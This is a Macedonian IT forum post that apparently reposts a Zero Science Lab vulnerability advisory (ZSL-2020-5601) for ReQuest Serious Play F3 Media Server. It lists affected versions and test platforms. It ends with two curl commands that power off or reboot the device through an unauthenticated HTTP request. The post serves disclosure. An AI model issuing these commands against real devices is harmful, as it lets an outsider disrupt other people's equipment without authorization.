• Здраво и добредојдовте на форумот на IT.mk.

  Доколку сеуште не сте дел од најголемата заедница на ИТ професионалци и ентузијасти во Македонија, можете бесплатно да се - процесот нема да ви одземе повеќе од 2-3 минути, а за полесна регистрација овозможивме и регистрирање со Facebook и Steam.

ReQuest Serious Play F3 Media Server 7.0.3 Remote Denial of Service

 • Ја почнал/а темата
 • #1

zeroscience

ZSL Bot v4.89.1.00
31 мај 2010
673
516
www.zeroscience.mk
Код:
ReQuest Serious Play F3 Media Server 7.0.3 Remote Denial of Service


Vendor: ReQuest Serious Play LLC
Product web page: http://www.request.com
Affected version: 7.0.3.4968 (Pro)
         7.0.2.4954
         6.5.2.4954
         6.4.2.4681
         6.3.2.4203
         2.0.1.823

Summary: F3 packs all the power of ReQuest's multi-zone serious Play servers
into a compact powerhouse. With the ability to add unlimited NAS devices, the
F3 can handle your entire family's media collection with ease.

Desc: The device can be shutdown or rebooted by an unauthenticated attacker
when issuing one HTTP GET request.

Tested on: ReQuest Serious Play® OS v7.0.1
      ReQuest Serious Play® OS v6.0.0
      Debian GNU/Linux 5.0
      Linux 3.2.0-4-686-pae
      Linux 2.6.36-request+lenny.5
      Apache/2.2.22
      Apache/2.2.9
      PHP/5.4.45
      PHP/5.2.6-1


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Macedonian Information Security Research and Development Laboratory
Zero Science Lab - https://www.zeroscience.mk - @zeroscience


Advisory ID: ZSL-2020-5601
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5601.php


01.08.2020

--


$ curl http://192.168.1.17:3664/remote/index.php?cmd=poweroff
$ curl http://192.168.1.17:3664/remote/index.php?cmd=reboot

 

Нови мислења

Последни Теми

Статистика

Теми
42,570
Мислења
820,761
Членови
28,229
Најнов член
redstone
На врв Дно